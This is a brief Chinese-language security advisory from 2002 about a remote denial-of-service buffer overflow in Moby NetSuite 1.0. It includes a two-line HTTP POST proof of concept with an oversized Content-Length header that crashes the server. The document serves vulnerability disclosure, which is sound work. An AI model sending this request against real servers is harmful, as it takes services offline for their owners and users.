Moby NetSuite POST处理缓冲区溢出漏洞发布时间:2002-11-29 更新时间:2002-11-29 严重程度:高 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:6277 受影响系统 Mobydisk Moby Netsuite 1.0详细描述 Moby NetSuite存在一个缓冲区溢出漏洞。当远程攻击者提交一个恶意的POST请求Moby NetSuite会崩溃导致拒绝服务,必须重启才能正常服务。 测试代码 Matthew Murphy (mattmurphy@kc.rr.com)提供了如下测试方法: POST /cgi-bin/test.cgi HTTP/1.0 Content-Length: 111111111111111111111111111 解决方案 无 相关信息 发现者:Matthew Murphy (mattmurphy@kc.rr.com) 相关资料:http://online.securityfocus.com/archive/1/301627 |